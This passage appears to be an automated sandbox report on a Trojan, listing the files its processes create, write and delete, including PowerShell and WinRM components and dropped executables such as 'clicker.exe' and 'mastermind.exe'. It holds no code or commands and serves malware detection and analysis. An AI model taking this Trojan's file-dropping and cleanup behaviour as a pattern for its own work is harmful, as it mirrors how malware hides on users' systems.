C:\f1fab1e3e4f7fec893e8\about_join.help.txt (2 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.security.dll-help.xml (1797 bytes)
C:\f1fab1e3e4f7fec893e8\wevtfwd.dll (3351 bytes)
C:\f1fab1e3e4f7fec893e8\about_escape_characters.help.txt (2 bytes)
C:\f1fab1e3e4f7fec893e8\update\eula.txt (586 bytes)
C:\f1fab1e3e4f7fec893e8\winrm.vbs (2727 bytes)
C:\f1fab1e3e4f7fec893e8\about_comparison_operators.help.txt (11 bytes)
C:\f1fab1e3e4f7fec893e8\powershell.exe (7339 bytes)
C:\f1fab1e3e4f7fec893e8\about_arithmetic_operators.help.txt (168 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.backgroundintelligenttransfer.management.dll-help.xml (2472 bytes)
C:\f1fab1e3e4f7fec893e8\about_functions.help.txt (586 bytes)
C:\f1fab1e3e4f7fec893e8\about_special_characters.help.txt (3 bytes)
C:\f1fab1e3e4f7fec893e8\winrshost.exe (22 bytes)
C:\f1fab1e3e4f7fec893e8\about_jobs.help.txt (12 bytes)
C:\f1fab1e3e4f7fec893e8\about_scopes.help.txt (76 bytes)
C:\f1fab1e3e4f7fec893e8\about_commonparameters.help.txt (12 bytes)
C:\f1fab1e3e4f7fec893e8\wsmplpxy.dll (603 bytes)
C:\f1fab1e3e4f7fec893e8\about_preference_variables.help.txt (37 bytes)
C:\f1fab1e3e4f7fec893e8\about_foreach.help.txt (10 bytes)
C:\f1fab1e3e4f7fec893e8\about_windows_powershell_2.0.help.txt (453 bytes)
C:\f1fab1e3e4f7fec893e8\about_history.help.txt (3 bytes)
C:\f1fab1e3e4f7fec893e8\wsmanhttpconfig.exe (3009 bytes)
C:\f1fab1e3e4f7fec893e8\about_pssessions.help.txt (9 bytes)
C:\f1fab1e3e4f7fec893e8\about_job_details.help.txt (824 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.backgroundintelligenttransfer.management.resources.dll (7 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.commands.management.dll-help.xml (28236 bytes)
C:\f1fab1e3e4f7fec893e8\about_for.help.txt (146 bytes)

The Trojan deletes the following file(s):

C:\f1fab1e3e4f7fec893e8\update\update.exe (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_language_keywords.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\update (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_bits_cmdlets.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\windowsremotemanagement.adm (0 bytes)
C:\f1fab1e3e4f7fec893e8 (0 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.editor.dll (0 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.backgroundintelligenttransfer.management.interop.dll (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_modules.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\update\updspapi.dll (0 bytes)
C:\f1fab1e3e4f7fec893e8\winrm.cmd (0 bytes)
C:\f1fab1e3e4f7fec893e8\system.management.automation.dll-help.xml (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_scripts.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_wildcards.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\winrscmd.dll (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_aliases.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\registry.format.ps1xml (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_try_catch_finally.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\spupdsvc.exe (0 bytes)
C:\f1fab1e3e4f7fec893e8\wsmauto.mof (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_regular_expressions.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_methods.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\winrm.ini (0 bytes)
C:\f1fab1e3e4f7fec893e8\types.ps1xml (0 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.security.resources.dll (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_type_operators.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\wsmprovhost.exe (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_while.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_parsing.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\wsman.format.ps1xml (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_for.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_trap.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_if.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\spuninst.exe (0 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.gpowershell.dll (0 bytes)
C:\f1fab1e3e4f7fec893e8\system.management.automation.resources.dll (0 bytes)
C:\f1fab1e3e4f7fec893e8\powershell_ise.exe (0 bytes)
C:\f1fab1e3e4f7fec893e8\pssetupnativeutils.exe (0 bytes)
C:\f1fab1e3e4f7fec893e8\wsmauto.dll (0 bytes)
C:\f1fab1e3e4f7fec893e8\powershellcore.format.ps1xml (0 bytes)
C:\f1fab1e3e4f7fec893e8\pspluginwkr.dll (0 bytes)
C:\f1fab1e3e4f7fec893e8\powershelltrace.format.ps1xml (0 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.commands.diagnostics.dll-help.xml (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_do.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\importallmodules.psd1 (0 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.commands.utility.resources.dll (0 bytes)
C:\f1fab1e3e4f7fec893e8\update\update.inf (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_path_syntax.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\winrmprov.mof (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_operators.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\pwrshsip.dll (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_reserved_words.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_parameters.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\windowsremoteshell.adm (0 bytes)
C:\f1fab1e3e4f7fec893e8\compiledcomposition.microsoft.powershell.gpowershell.dll (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_types.ps1xml.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_pssession_details.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\default.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_assignment_operators.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_transactions.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_comment_based_help.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_pssnapins.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_core_commands.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\eventforwarding.adm (0 bytes)
C:\f1fab1e3e4f7fec893e8\powershell.exe.mui (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_format.ps1xml.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_hash_tables.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\pwrshplugin.dll (0 bytes)
C:\_571265_ (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_eventlogs.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\certificate.format.ps1xml (0 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.commands.management.resources.dll (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_script_internationalization.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_variables.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\update\spcustom.dll (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_remote_troubleshooting.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\wsmwmipl.dll (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_requires.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_command_syntax.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_remote_faq.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.security.dll (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_ref.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_wmi_cmdlets.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_functions_advanced_methods.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\getevent.types.ps1xml (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_split.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_environment_variables.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\profile.ps1 (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_pipelines.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\pwrshmsg.dll (0 bytes)
C:\f1fab1e3e4f7fec893e8\winrsmgr.dll (0 bytes)
C:\f1fab1e3e4f7fec893e8\update\update.ver (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_functions_advanced_parameters.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_remote.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\wsmpty.xsl (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_properties.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_break.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_quoting_rules.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_join.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_functions_advanced.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\wsmtxt.xsl (0 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.commands.utility.dll (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_redirection.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\winrs.exe (0 bytes)
C:\f1fab1e3e4f7fec893e8\help.format.ps1xml (0 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.backgroundintelligenttransfer.management.dll (0 bytes)
C:\f1fab1e3e4f7fec893e8\wsmsvc.dll (0 bytes)
C:\f1fab1e3e4f7fec893e8\winrssrv.dll (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_commonparameters.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.wsman.management.dll (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_objects.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_ws-management_cmdlets.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\wtrinstaller.ico (0 bytes)
C:\f1fab1e3e4f7fec893e8\windowspowershellhelp.chm (0 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.consolehost.resources.dll (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_remote_jobs.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\bitstransfer.psd1 (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_remote_requirements.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_remote_output.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_functions_cmdletbindingattribute.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_script_blocks.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_profiles.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.commands.diagnostics.resources.dll (0 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.wsman.management.resources.dll (0 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.consolehost.dll (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_locations.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_arrays.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_signing.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_automatic_variables.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\system.management.automation.dll (0 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.commands.utility.dll-help.xml (0 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.graphicalhost.resources.dll (0 bytes)
C:\f1fab1e3e4f7fec893e8\spmsg.dll (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_windows_powershell_ise.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_data_sections.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_providers.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\powershell_ise.resources.dll (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_debuggers.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.editor.resources.dll (0 bytes)
C:\f1fab1e3e4f7fec893e8\pscustomsetuputil.exe (0 bytes)
C:\f1fab1e3e4f7fec893e8\winrmprov.dll (0 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.commands.diagnostics.dll (0 bytes)
C:\f1fab1e3e4f7fec893e8\diagnostics.format.ps1xml (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_logical_operators.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_line_editing.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_command_precedence.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\filesystem.format.ps1xml (0 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.consolehost.dll-help.xml (0 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.graphicalhost.dll (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_prompts.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.wsman.runtime.dll (0 bytes)
C:\f1fab1e3e4f7fec893e8\bitstransfer.format.ps1xml (0 bytes)
C:\f1fab1e3e4f7fec893e8\update\kb968930xp.cat (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_session_configurations.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_execution_policies.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.wsman.management.dll-help.xml (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_switch.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_throw.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.security.dll-help.xml (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_return.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\wsmres.dll (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_escape_characters.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\update\eula.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\winrm.vbs (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_comparison_operators.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\wevtfwd.dll (0 bytes)
C:\f1fab1e3e4f7fec893e8\powershell.exe (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_arithmetic_operators.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.backgroundintelligenttransfer.management.dll-help.xml (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_functions.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_special_characters.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\winrshost.exe (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_jobs.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_scopes.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_continue.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\wsmplpxy.dll (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_preference_variables.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_foreach.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.backgroundintelligenttransfer.management.resources.dll (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_history.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.gpowershell.resources.dll (0 bytes)
C:\f1fab1e3e4f7fec893e8\wsmanhttpconfig.exe (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_pssessions.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_job_details.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_windows_powershell_2.0.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.commands.management.dll-help.xml (0 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.commands.management.dll (0 bytes)
C:\f1fab1e3e4f7fec893e8\dotnettypes.format.ps1xml (0 bytes)

The process master.exe:1488 makes changes in the file system.


The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\getip[1].htm (0 bytes)

The process hwopt12052016001648_updater_service.exe:380 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\Temp\4p64sgqi.cmdline (358 bytes)
%System%\config\system (3811 bytes)
%WinDir%\Temp\4p64sgqi.out (441 bytes)
%WinDir%\Temp\4p64sgqi.0.cs (676 bytes)
%System%\config (200 bytes)
%System%\config\SYSTEM.LOG (5497 bytes)

The Trojan deletes the following file(s):

%WinDir%\Temp\4p64sgqi.cmdline (0 bytes)
%WinDir%\Temp\4p64sgqi.dll (0 bytes)
%WinDir%\Temp\4p64sgqi.out (0 bytes)
%WinDir%\Temp\4p64sgqi.0.cs (0 bytes)
%WinDir%\Temp\4p64sgqi.tmp (0 bytes)
%WinDir%\Temp\4p64sgqi.err (0 bytes)

The process mscorsvw.exe:3756 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPFE.tmp\Microsoft.PowerShell.ConsoleHost.dll (33378 bytes)

The Trojan deletes the following file(s):

%WinDir%\assembly\NativeImages_v2.0.50727_32\index5c.dat (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Microsoft.PowerShel# (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPFE.tmp (0 bytes)

The process mscorsvw.exe:2196 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPFC.tmp\Microsoft.PowerShell.Commands.Management.dll (45020 bytes)

The Trojan deletes the following file(s):

%WinDir%\assembly\NativeImages_v2.0.50727_32\Microsoft.PowerShel# (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\index5a.dat (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPFC.tmp (0 bytes)

The process mscorsvw.exe:3536 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPFB.tmp\Microsoft.PowerShell.Commands.Diagnostics.dll (33116 bytes)

The Trojan deletes the following file(s):

%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPFB.tmp (0 bytes)

The process mscorsvw.exe:3044 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPF6.tmp\Microsoft.BackgroundIntelligentTransfer.Management.dll (27440 bytes)

The Trojan deletes the following file(s):

%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPF6.tmp (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\index58.dat (0 bytes)

The process mscorsvw.exe:2564 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAP104.tmp\Microsoft.WSMan.Runtime.dll (17713 bytes)

The Trojan deletes the following file(s):

%WinDir%\assembly\NativeImages_v2.0.50727_32\index62.dat (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAP104.tmp (0 bytes)

The process mscorsvw.exe:3180 makes changes in the file system.


The Trojan deletes the following file(s):

%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAP105.tmp (0 bytes)

The process mscorsvw.exe:2680 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPFD.tmp\Microsoft.PowerShell.Commands.Utility.dll (40638 bytes)

The Trojan deletes the following file(s):

%WinDir%\assembly\NativeImages_v2.0.50727_32\Microsoft.PowerShel# (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\index5b.dat (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPFD.tmp (0 bytes)

The process mscorsvw.exe:3832 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAP101.tmp\Microsoft.PowerShell.GraphicalHost.dll (47422 bytes)

The Trojan deletes the following file(s):

%WinDir%\assembly\NativeImages_v2.0.50727_32\Microsoft.PowerShel# (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAP101.tmp (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\index5f.dat (0 bytes)

The process mscorsvw.exe:224 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAP102.tmp\Microsoft.PowerShell.Security.dll (35530 bytes)

The Trojan deletes the following file(s):

%WinDir%\assembly\NativeImages_v2.0.50727_32\Microsoft.PowerShel# (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\index60.dat (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAP102.tmp (0 bytes)

The process mscorsvw.exe:1556 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPFF.tmp\Microsoft.PowerShell.Editor.dll (64500 bytes)

The Trojan deletes the following file(s):

%WinDir%\assembly\NativeImages_v2.0.50727_32\Microsoft.PowerShel# (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPFF.tmp (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\index5d.dat (0 bytes)

The process mscorsvw.exe:2536 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAP100.tmp\Microsoft.PowerShell.GPowerShell.dll (50011 bytes)

The Trojan deletes the following file(s):

%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAP100.tmp (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Microsoft.PowerShel# (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\index5e.dat (0 bytes)

The process mscorsvw.exe:2000 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v4.0.30319\ngen_service.log (514 bytes)
%WinDir%\Microsoft.NET\Framework\v4.0.30319\NGEN_SERVICE.LOG (81233 bytes)

The process mscorsvw.exe:2064 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAP103.tmp\Microsoft.WSMan.Management.dll (34061 bytes)

The Trojan deletes the following file(s):

%WinDir%\assembly\NativeImages_v2.0.50727_32\index61.dat (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAP103.tmp (0 bytes)

The process %original file name%.exe:1328 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsq2.tmp\UAC.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq2.tmp\mastermind\mastermind.exe (47508 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq2.tmp\NActions.dll (5869 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq2.tmp\sib.dat (23 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq2.tmp\07-04-2016_hwopt_3.0.10-1\07-04-2016_hwopt_3.0.10-1.exe (166653 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq2.tmp\clicker\clicker.exe (8876 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq2.tmp\summit_sharma\summit_sharma.exe (44026 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq2.tmp\Osman_Navigation\Osman_Navigation.exe (31448 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsq2.tmp\sib.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq2.tmp\summit_sharma (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq2.tmp\NActions.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq2.tmp\mastermind\mastermind.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq2.tmp\UAC.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq2.tmp\Osman_Navigation (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq2.tmp\07-04-2016_hwopt_3.0.10-1\07-04-2016_hwopt_3.0.10-1.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq2.tmp\clicker (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq2.tmp\summit_sharma\summit_sharma.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq2.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq2.tmp\07-04-2016_hwopt_3.0.10-1 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq2.tmp\Osman_Navigation\Osman_Navigation.exe (0 bytes)

The process update.exe:3572 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%System%\WindowsPowerShell\v1.0\SETE2.tmp (4185 bytes)
%System%\WindowsPowerShell\v1.0\SET86.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SETB7.tmp (7 bytes)
%System%\SET3A.tmp (1 bytes)
%System%\WindowsPowerShell\v1.0\SET74.tmp (49 bytes)
%System%\winrm\0409\SET52.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SETBC.tmp (31 bytes)
%System%\WindowsPowerShell\v1.0\SET57.tmp (1281 bytes)
%WinDir%\Help\SETE0.tmp (12287 bytes)
%System%\WindowsPowerShell\v1.0\SETE8.tmp (16 bytes)
%WinDir%\SECF3.tmp (1897 bytes)
%System%\GroupPolicy\Adm\SET35.tmp (38 bytes)
%System%\WindowsPowerShell\v1.0\SET58.tmp (601 bytes)
%System%\SET44.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET7C.tmp (438 bytes)
%System%\WindowsPowerShell\v1.0\SET84.tmp (5 bytes)
%System%\GroupPolicy\Adm\SET4F.tmp (38 bytes)
%System%\WindowsPowerShell\v1.0\SETBE.tmp (1 bytes)
%System%\WindowsPowerShell\v1.0\Examples\SETD7.tmp (15 bytes)
%System%\WindowsPowerShell\v1.0\SET8D.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SETCC.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\SETC9.tmp (5 bytes)
%WinDir%\inf\SET34.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET99.tmp (6 bytes)
%System%\WindowsPowerShell\v1.0\SETA0.tmp (1 bytes)
%System%\WindowsPowerShell\v1.0\SET9F.tmp (11 bytes)
%System%\WindowsPowerShell\v1.0\SETD3.tmp (6 bytes)
%System%\wbem\SET1F.tmp (4 bytes)
%System%\SET49.tmp (25 bytes)
%System%\WindowsPowerShell\v1.0\SETA5.tmp (2 bytes)
%System%\SET25.tmp (7433 bytes)
%System%\SET20.tmp (1 bytes)
%System%\WindowsPowerShell\v1.0\SETE4.tmp (1425 bytes)
%System%\WindowsPowerShell\v1.0\SET59.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SETC1.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SETD2.tmp (16 bytes)
%System%\WindowsPowerShell\v1.0\SETD6.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET8F.tmp (5 bytes)
%System%\SET2A.tmp (1281 bytes)
%WinDir%\inf\oem10.PNF (12902 bytes)
%System%\WindowsPowerShell\v1.0\SETE6.tmp (40 bytes)
%System%\SET2D.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET68.tmp (15 bytes)
%System%\WindowsPowerShell\v1.0\SET62.tmp (18 bytes)
%System%\WindowsPowerShell\v1.0\SET56.tmp (24 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETDD.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SETE7.tmp (601 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk (2 bytes)
%System%\WindowsPowerShell\v1.0\SETA6.tmp (7 bytes)
%System%\SET22.tmp (35 bytes)
%System%\SET3D.tmp (1281 bytes)
%WinDir%\comsetup.log (48646 bytes)
%System%\spmsg.dll (14 bytes)
%System%\WindowsPowerShell\v1.0\SETC8.tmp (6 bytes)
%System%\WindowsPowerShell\v1.0\SETB0.tmp (9 bytes)
